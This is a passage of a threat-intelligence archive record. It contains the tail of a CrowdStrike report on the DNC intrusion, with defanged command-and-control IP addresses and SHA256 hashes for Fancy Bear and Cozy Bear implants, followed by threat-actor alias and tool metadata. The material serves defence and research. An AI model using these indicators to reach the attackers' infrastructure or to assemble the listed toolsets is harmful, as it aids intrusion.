C2\r\n187\u003c.\u003e33\u003c.\u003e33\u003c.\u003e8:80\r\nCOZY\r\nBEAR\r\nC2 Powershell implant C2\r\nfd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5\r\nFANCY\r\nBEAR\r\nSHA256\r\ntwain_64.dll (64-bit\r\nX-Agent implant)\r\n4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976\r\nFANCY\r\nBEAR\r\nSHA256\r\nVmUpgradeHelper.exe\r\n(X-Tunnel implant)\r\n40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f\r\nFANCY\r\nBEAR\r\nSHA256\r\nVmUpgradeHelper.exe\r\n(X-Tunnel implant)\r\n185\u003c.\u003e86\u003c.\u003e148\u003c.\u003e227:443\r\nFANCY\r\nBEAR\r\nC2 X-Agent implant C2\r\n45\u003c.\u003e32\u003c.\u003e129\u003c.\u003e185:443\r\nFANCY\r\nBEAR\r\nC2 X-Tunnel implant C2\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 7 of 8\n\n23\u003c.\u003e227\u003c.\u003e196\u003c.\u003e217:443\r\nFANCY\r\nBEAR\r\nC2 X-Tunnel implant C2\r\nSource: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia", "MITRE" ], "references": [ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "report_names": [ "bears-midst-intrusion-democratic-national-committee" ], "threat_actors": [ { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "cfdd35af-bd12-4c03-8737-08fca638346d", "created_at": "2022-10-25T16:07:24.165595Z", "updated_at": "2026-04-10T02:00:04.887031Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Cosmic Wolf", "Marbled Dust", "Silicon", "Teal Kurma", "UNC1326" ], "source_name": "ETDA:Sea Turtle", "tools": [ "Drupalgeddon" ], "source_id": "ETDA", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "33ae2a40-02cd-4dba-8461-d0a50e75578b", "created_at": "2023-01-06T13:46:38.947314Z", "updated_at": "2026-04-10T02:00:03.155091Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "UNC1326", "COSMIC WOLF", "Marbled Dust", "SILICON", "Teal Kurma" ], "source_name": "MISPGALAXY:Sea Turtle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "62b1b01f-168d-42db-afa1-29d794abc25f", "created_at": "2025-04-23T02:00:55.22426Z", "updated_at": "2026-04-10T02:00:05.358041Z", "deleted_at": null, "main_name": "Sea Turtle", "aliases": [ "Sea Turtle", "Teal Kurma", "Marbled Dust", "Cosmic Wolf", "SILICON" ], "source_name": "MITRE:Sea Turtle", "tools": [ "SnappyTCP" ], "source_id": "MITRE", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434419, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.pdf", "text": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.txt", "img": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.jpg" } }